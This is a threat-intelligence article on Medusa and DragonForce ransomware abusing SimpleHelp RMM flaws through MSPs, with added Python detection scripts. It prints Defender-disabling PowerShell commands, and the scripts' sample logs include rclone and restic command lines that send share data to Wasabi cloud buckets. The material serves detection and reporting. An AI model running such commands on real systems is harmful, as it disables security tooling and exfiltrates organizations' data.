A sophisticated wave of ransomware attacks targeting UK organizations has emerged in 2025, exploiting vulnerabilities in the widely used SimpleHelp Remote Monitoring and Management (RMM) platform.
Two prominent ransomware groups, Medusa and DragonForce, have weaponized three critical vulnerabilities (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728) to gain unauthorized access through trusted third-party vendors and Managed Service Providers (MSPs).
The campaigns mark a concerning shift in ransomware tactics: rather than attacking victim organizations directly, the threat actors compromise the supplier-controlled RMM infrastructure that already has a foothold inside them.
By exploiting unpatched SimpleHelp instances running with SYSTEM-level privileges, the attackers gained complete control over downstream customer networks with minimal resistance.
This supply chain approach lets adversaries bypass traditional perimeter defenses by abusing the trust that organizations place in their service providers and in the remote-access tooling those providers operate.
Zensec security researchers identified the coordinated campaigns after investigating multiple intrusions during the first and second quarters of 2025.
The Medusa ransomware group struck first in Q1 2025, deploying its payloads through compromised MSP environments.
Following a similar playbook, DragonForce launched its offensive in Q2 2025, reaching victims through the same vulnerable RMM infrastructure.
Blog site (Source: Zensec)
Both groups demonstrated mature operational capabilities, combining automated deployment tooling with hands-on-keyboard activity to maximize impact.
The financial and operational consequences for affected organizations have been severe. Beyond encrypting systems, both groups engaged in double extortion, exfiltrating sensitive corporate data before deploying the ransomware.
Victims faced not only the immediate disruption of encrypted systems but also the threat of having their data published on dark web leak sites, forcing difficult decisions about ransom payment and public disclosure.
Attack Execution and Defense Evasion Techniques
Once inside victim networks via the compromised SimpleHelp platform, both ransomware groups deployed purpose-built toolsets to disable security protections and establish persistence.
Medusa Blog (Source: Zensec)
The Medusa group used PDQ Deploy to push PowerShell commands that systematically dismantled Microsoft Defender protections across the environment.
The attackers ran base64-encoded commands that added exclusion paths and disabled real-time monitoring and cloud (MAPS) reporting; decoded, the payload consisted of:
Add-MpPreference -ExclusionPath "C:"
Set-MpPreference -MAPSReporting Disable
Set-MpPreference -DisableRealtimeMonitoring $true
The encoded PowerShell payload was delivered through PDQ Deploy; the decoded version reveals the defense-disabling commands above, and the corresponding Defender exclusion modifications made by the threat actors were observed on the affected hosts.
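Because the PDQ Deploy step leaves only a base64 blob in process-creation telemetry, the detection side of this technique is decoding that blob and matching the Defender-tampering cmdlets inside it. The Python below is an added example, not code from the Zensec report or from this article: it decodes a powershell.exe -EncodedCommand argument (base64 of the UTF-16LE script, which is why a UTF-8 decode of the blob fails) and flags the three tampering commands shown above. The log lines are constructed samples rather than real telemetry, and the signature list and field handling are assumptions a hunter would tune to their own environment.

```python
import base64
import re

# Defender-tampering cmdlets the Medusa operators pushed via PDQ Deploy, per the
# Zensec findings above. (regex, description) pairs; extend as needed (assumption).
TAMPER_SIGNATURES = [
    (re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
     "Defender exclusion path added"),
    (re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I),
     "Defender real-time monitoring disabled"),
    (re.compile(r"Set-MpPreference\s+-MAPSReporting\s+Disable", re.I),
     "Defender cloud (MAPS) reporting disabled"),
]

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc).
ENCODED_RE = re.compile(r"[-/](?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext script behind a -EncodedCommand argument, or None.

    powershell.exe expects base64 of the UTF-16LE script (not UTF-8), so the
    blob must be decoded as utf-16-le to recover the original commands."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_defender_tampering(cmdline):
    """Decode the command line if it is encoded, then return matched descriptions."""
    text = decode_encoded_command(cmdline) or cmdline
    return [desc for rx, desc in TAMPER_SIGNATURES if rx.search(text)]


def scan(lines):
    """Map the index of each suspicious command line to its findings."""
    findings = {}
    for i, line in enumerate(lines):
        hits = find_defender_tampering(line)
        if hits:
            findings[i] = hits
    return findings


def encode_for_powershell(script):
    """Build an -EncodedCommand blob the same way an operator would (used for samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry), as the CommandLine field
# of Sysmon Event ID 1 or Security Event ID 4688 would carry them.
SAMPLE_PAYLOAD = ('Add-MpPreference -ExclusionPath "C:\\"; '
                  'Set-MpPreference -MAPSReporting Disable; '
                  'Set-MpPreference -DisableRealtimeMonitoring $true')
SAMPLE_LOG = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_for_powershell(SAMPLE_PAYLOAD),
    'powershell.exe -Command "Get-Date"',
    "powershell.exe -enc " + encode_for_powershell("Get-MpComputerStatus"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
        print("  decoded:", decode_encoded_command(SAMPLE_LOG[idx]))
```

Running it flags only the first sample line, with all three findings; the third line is encoded but benign and is correctly ignored, which is the point of matching on the decoded content rather than on the mere presence of -EncodedCommand.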
Medusa then deployed its ransomware payload, identified as "Gaze.exe," alongside drivers including Smuot.sys and CSAgent.sys that further inhibit antivirus products.
Researchers have linked these drivers to the Abyssworker toolkit, a known defense-evasion framework used to neutralize endpoint security products.
DragonForce operators took a different approach, creating local administrator accounts named "admin" and installing AnyDesk for persistent remote access.
They also targeted Veeam backup servers, using the Get-Veeam-Creds.ps1 script to recover plaintext credentials from the Veeam SQL credential store, undermining the victims' ability to restore from backup.
Data exfiltration methods differed between the groups. Medusa used RClone, renamed to "lsp.exe" to evade name-based detections, with filter parameters limiting transfers to files under 1500 MB and applying a 1500-day age cutoff.
DragonForce used Restic, an open-source backup tool, to push stolen data to Wasabi S3-compatible cloud storage endpoints (wasabisys.com).
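Renaming rclone to lsp.exe defeats detections keyed on the image name, but not detections keyed on the arguments: rclone's verb-plus-remote:path grammar and its --max-size/--max-age style flags, and restic's -r s3:... repository syntax, survive the rename. The Python below is an added example, not code from the Zensec report or this article, that classifies process command lines by those argument traits and records whether the binary name matches the tool it is behaving like. The sample command lines, the bucket and remote names and the image paths are constructed for illustration; the flag and verb lists are assumptions a hunter would extend.

```python
import re

# Argument-level traits of the two exfiltration tools described in the Zensec findings.
# The binary name is deliberately treated as weak evidence: Medusa ran rclone as lsp.exe.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "lsd", "lsjson"}
RCLONE_FLAGS = {"--max-size", "--max-age", "--min-age", "--transfers", "--config",
                "--no-check-certificate", "--ignore-existing"}
RCLONE_REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:")   # remote:path; 2+ chars rules out C:\
RESTIC_VERBS = {"backup", "init", "snapshots", "restore", "copy"}
RESTIC_REPO_RE = re.compile(r"^(s3|b2|azure|gs|rest|sftp|swift|rclone):", re.I)
KNOWN_IMAGES = {"rclone": "rclone.exe", "restic": "restic.exe"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', cmdline)]


def classify_exfil(cmdline):
    """Return a finding dict for an rclone/restic-shaped invocation, else None."""
    toks = tokenize(cmdline)
    if len(toks) < 2:
        return None
    image, argv = toks[0], toks[1:]
    basename = re.split(r"[\\/]", image)[-1].lower()
    lowered = [t.lower() for t in argv]
    verb = next((t for t in lowered if not t.startswith("-")), None)
    flags = {t.split("=", 1)[0] for t in lowered if t.startswith("--")}
    tool, evidence = None, []

    # rclone: <verb> <source> <remote:path> plus its characteristic flags.
    if verb in RCLONE_VERBS:
        remotes = [t for t in argv if RCLONE_REMOTE_RE.match(t)]
        if flags & RCLONE_FLAGS:
            evidence.append("rclone flags: " + " ".join(sorted(flags & RCLONE_FLAGS)))
        if remotes:
            evidence.append("rclone remote: " + remotes[0])
        if evidence:
            tool = "rclone"

    # restic: a backend-prefixed repository (s3:, b2:, ...) plus a restic verb.
    if tool is None and RESTIC_VERBS & set(lowered):
        repos = [t for t in argv if RESTIC_REPO_RE.match(t)]
        if repos:
            tool = "restic"
            evidence.append("restic repo: " + repos[0])

    if tool is None:
        return None
    if "wasabisys.com" in cmdline.lower():
        evidence.append("Wasabi (wasabisys.com) endpoint")
    return {"tool": tool, "image": basename,
            "renamed": basename != KNOWN_IMAGES[tool], "evidence": evidence}


def scan(lines):
    """Map the index of each matching command line to its finding."""
    findings = {}
    for i, line in enumerate(lines):
        f = classify_exfil(line)
        if f:
            findings[i] = f
    return findings


# Constructed sample command lines (not real telemetry). Paths, remote and bucket
# names are hypothetical; the rclone line mirrors the 1500MB / 1500-day filters.
SAMPLE_LOG = [
    r'"C:\ProgramData\lsp.exe" copy "C:\Shares\Finance" wasabi:exfil-bucket/finance --max-size 1500M --max-age 1500d --transfers 16',
    r'"C:\Windows\System32\svchost.exe" -k netsvcs -p',
    r'restic.exe -r s3:s3.wasabisys.com/backup-bucket backup "C:\Shares" --password-file C:\Temp\pw.txt',
    r'robocopy.exe C:\Data \\fileserver\backup /E',
]

if __name__ == "__main__":
    for idx, f in scan(SAMPLE_LOG).items():
        flag = " (renamed binary)" if f["renamed"] else ""
        print(f"line {idx}: {f['tool']} as {f['image']}{flag}: {'; '.join(f['evidence'])}")
```

The robocopy and svchost lines fall through because neither carries a remote:path or backend-prefixed repository, which keeps the logic from firing on ordinary file copies; the lsp.exe line is reported as rclone with renamed set, which is the signal the rename was meant to suppress.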
After encryption, Medusa victims saw files carrying the ".MEDUSA" extension and ransom notes titled "!!!READ_ME_MEDUSA!!!.txt," while DragonForce appended the ".dragonforce_encrypted" extension and left "readme.txt" notes on affected machines.
